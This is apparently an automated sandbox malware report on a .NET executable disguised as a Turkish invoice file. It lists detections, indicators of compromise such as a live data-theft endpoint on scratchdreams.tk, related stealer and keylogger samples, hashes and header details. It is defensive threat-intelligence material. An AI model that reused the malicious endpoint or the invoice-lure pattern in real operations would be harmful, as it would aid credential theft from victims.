FATURA VE BELGELER..exe	42%	ReversingLabs	Win32.Ransomware.Loki
FATURA VE BELGELER..exe	56%	Virustotal		Browse
FATURA VE BELGELER..exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
reallyfreegeoip.org	2%	Virustotal	Browse
scratchdreams.tk	17%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://tempuri.org/DataSetGen.xsd	0%	Avira URL Cloud	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/191.96.227.219$	0%	Avira URL Cloud	safe
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/191.96.227.219	0%	Avira URL Cloud	safe
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	16%	Virustotal		Browse
http://tempuri.org/DataSetGen.xsd	2%	Virustotal		Browse
https://scratchdreams.tk	18%	Virustotal		Browse
http://scratchdreams.tk	17%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	172.67.177.134	true	false	2%, Virustotal, Browse	unknown
scratchdreams.tk	104.21.27.85	true	false	17%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.247.73	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/191.96.227.219	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://tempuri.org/DataSetGen.xsd	FATURA VE BELGELER..exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://scratchdreams.tk	FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/191.96.227.219$	FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.org	FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://reallyfreegeoip.org	FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002AF3000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://checkip.dyndns.com	FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://scratchdreams.tk	FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
104.21.27.85	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435996
Start date and time:	2024-05-03 15:18:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FATURA VE BELGELER..exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 145 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:18:51	API Interceptor	8302041x Sleep call for process: FATURA VE BELGELER..exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.177.134	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
104.21.27.85	https://community.dailisi.com/?FO5Oec=sku_number_=567pqr&gn=4tywizt_gdPn3Pb8RGL5Om.gd_0GPMOJ53S1*ZGJhdGVtYW5AaGlsY29ycC5jb20	Get hash	malicious	Unknown	Browse
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
132.226.247.73	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	M0uVrW4HJb.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	sample1.exe	Get hash	malicious	SeclesBot, TrojanRansom	Browse	checkip.dyndns.org/
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	PO_287104.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.130.0
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
scratchdreams.tk	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.169.18
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
reallyfreegeoip.org	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	1110022.vbs	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://thermi-loire.filedocumentoffer.top/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://link.mail.beehiiv.com/ls/click?upn=u001.IqoImSQVHcVxIpjj5tF8PKdnkUx7B0gZvk-2F1toRXAzrwo1IfCSZebJvLdsCNYtabH-2FJJUi4-2BU9h4p8-2BjwHSrla8s4EX45s2vyXnB688GpC5g6FI96QEVO877nYnFrOcvfBTXnhIU6H7GyXRzAiLvFeIalNuHr2xTSqkSgKSPh-2FA-3DWGdz_jCzYVg-2FthKCAbkomx99zRg7l8DVr9Af8G5SAsmBD07V6ffRB5wqX9lt8-2FmPAy2Qr3CujhkFjpQ743YFFlhai-2F5kBESIA7UZr1GNYDE0W31finvOVdMYvH1fb04OORWfnY4DoricEy24tk1y-2FtTgRp6H0RvqrbTBYKN-2F0-2B3iEOtFvzdQNgzXz2OqRB-2BGIbu7fbUnG7nSVce7kWRIPTjFRfRjlfGXHz5H5vG-2Bq-2BZilnOSmmACqTKNh9pRcIuzFjaQYzRG-2BTDNM1Gwx5nuodUz2v1JSbqPEgz9mS-2FBuRJi79KEWfzJmapSoyODHdLM8MMwDdtb9o8Z5pq65-2Fkrp5n8HnYA9o1YhTzPWLCpQ8QQ4MWoNw1lW0VhLp6aaZ-2F4fCW4ineUYmLWwbzjqlIlKFEU3JAESXgqzNUcMMu8bWwFJYu-2BNheBWlCmNleCEdYkLRpfZ#amVhbi1wYXVsLm1hY2hhcmlzQHZway5iZQ==	Get hash	malicious	Unknown	Browse	104.18.68.40
	REMITTANCE ADVICE- 03 May, 2024.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	invoice.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse	104.20.4.235
	Transfer copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	https://verification.industriemaschinevertrieb.top	Get hash	malicious	Unknown	Browse	104.17.2.184
	Invoice _ 2357.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	RFQ-M310 .exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	http://www.santec-ag.ch	Get hash	malicious	Unknown	Browse	172.67.185.53
UTMEMUS	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	sQSqM58mvl.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	128.169.78.71
	tajma.x86-20240421-1027.elf	Get hash	malicious	Mirai, Okiru	Browse	128.169.79.206
	M0uVrW4HJb.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	74pdei4s1x.elf	Get hash	malicious	Mirai	Browse	132.192.1.144
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	kGbjOmkleq.elf	Get hash	malicious	Mirai	Browse	132.226.89.207
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
CLOUDFLARENETUS	1110022.vbs	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://thermi-loire.filedocumentoffer.top/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://link.mail.beehiiv.com/ls/click?upn=u001.IqoImSQVHcVxIpjj5tF8PKdnkUx7B0gZvk-2F1toRXAzrwo1IfCSZebJvLdsCNYtabH-2FJJUi4-2BU9h4p8-2BjwHSrla8s4EX45s2vyXnB688GpC5g6FI96QEVO877nYnFrOcvfBTXnhIU6H7GyXRzAiLvFeIalNuHr2xTSqkSgKSPh-2FA-3DWGdz_jCzYVg-2FthKCAbkomx99zRg7l8DVr9Af8G5SAsmBD07V6ffRB5wqX9lt8-2FmPAy2Qr3CujhkFjpQ743YFFlhai-2F5kBESIA7UZr1GNYDE0W31finvOVdMYvH1fb04OORWfnY4DoricEy24tk1y-2FtTgRp6H0RvqrbTBYKN-2F0-2B3iEOtFvzdQNgzXz2OqRB-2BGIbu7fbUnG7nSVce7kWRIPTjFRfRjlfGXHz5H5vG-2Bq-2BZilnOSmmACqTKNh9pRcIuzFjaQYzRG-2BTDNM1Gwx5nuodUz2v1JSbqPEgz9mS-2FBuRJi79KEWfzJmapSoyODHdLM8MMwDdtb9o8Z5pq65-2Fkrp5n8HnYA9o1YhTzPWLCpQ8QQ4MWoNw1lW0VhLp6aaZ-2F4fCW4ineUYmLWwbzjqlIlKFEU3JAESXgqzNUcMMu8bWwFJYu-2BNheBWlCmNleCEdYkLRpfZ#amVhbi1wYXVsLm1hY2hhcmlzQHZway5iZQ==	Get hash	malicious	Unknown	Browse	104.18.68.40
	REMITTANCE ADVICE- 03 May, 2024.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	invoice.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse	104.20.4.235
	Transfer copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	https://verification.industriemaschinevertrieb.top	Get hash	malicious	Unknown	Browse	104.17.2.184
	Invoice _ 2357.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	RFQ-M310 .exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	http://www.santec-ag.ch	Get hash	malicious	Unknown	Browse	172.67.185.53

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	RFQ-M310 .exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	172.67.177.134
	https://docs.google.com/drawings/d/1ir0TPTFrA2ZlsddUs_9uV_uLa1D8P2cUzCHWO0EIr4E/preview	Get hash	malicious	Unknown	Browse	172.67.177.134
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	G1lnGpOLK4.exe	Get hash	malicious	Njrat	Browse	172.67.177.134
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	172.67.177.134
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	1110022.vbs	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Odeme -(Mayis).lnk.lnk	Get hash	malicious	XenoRAT	Browse	104.21.27.85
	http://url9823.ville.labrecque.qc.ca	Get hash	malicious	Unknown	Browse	104.21.27.85
	tt receipts.exe	Get hash	malicious	DarkTortilla	Browse	104.21.27.85
	Transfer copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.27.85
	Invoice _ 2357.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Eurovisioner.exe	Get hash	malicious	GuLoader	Browse	104.21.27.85
	RFQ-M310 .exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	104.21.27.85
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	nP050NMmkE.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85

Process:	C:\Users\user\Desktop\FATURA VE BELGELER..exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.200278356352031
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	FATURA VE BELGELER..exe
File size:	964'608 bytes
MD5:	c62da7a3eac6bae78ea8a771faa65d17
SHA1:	302984629aa44746a3e8b832c4fcacabcc585aaa
SHA256:	0d5548b7d4696c67dba1d5bb827285ed2d3846fd0ad28140c198ad9c467f1bb0
SHA512:	8e534c1e0d80757c9b8d02895f67d0ac46c15dd3f5fd418e4482859c8252f64bc0dff4d436da1af81db37d1593a0430d30562e74a1f8e845b030aa4f421c5add
SSDEEP:	12288:MSYxUeoUKT5lmvV9fGRaBeUBSMUkA4zcL4pLou:gz45lmdlIaHBokA1L4j
TLSH:	73254DD1F1E08896E96B0AB1AD3AA43015B7BE5C58B4C10C569DB71B2BF3341609FF1E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....4f..............0..(...........F... ...`....@.. ....................... ............@................................

File Icon


Icon Hash:	aea4accc16a3d9be

Static PE Info

General

Entrypoint:	0x4a4616
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x663494C4 [Fri May 3 07:39:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
cmp dword ptr [ecx], esi
xor al, 4Fh
cmp byte ptr [esi], dh
xor eax, 00004251h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+39h], cl
cmp byte ptr [edx+eax*2], dh
push ebp
inc esp
cmp dword ptr [eax+5Ah], ecx
aaa
cmp byte ptr [eax+eax+00h], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
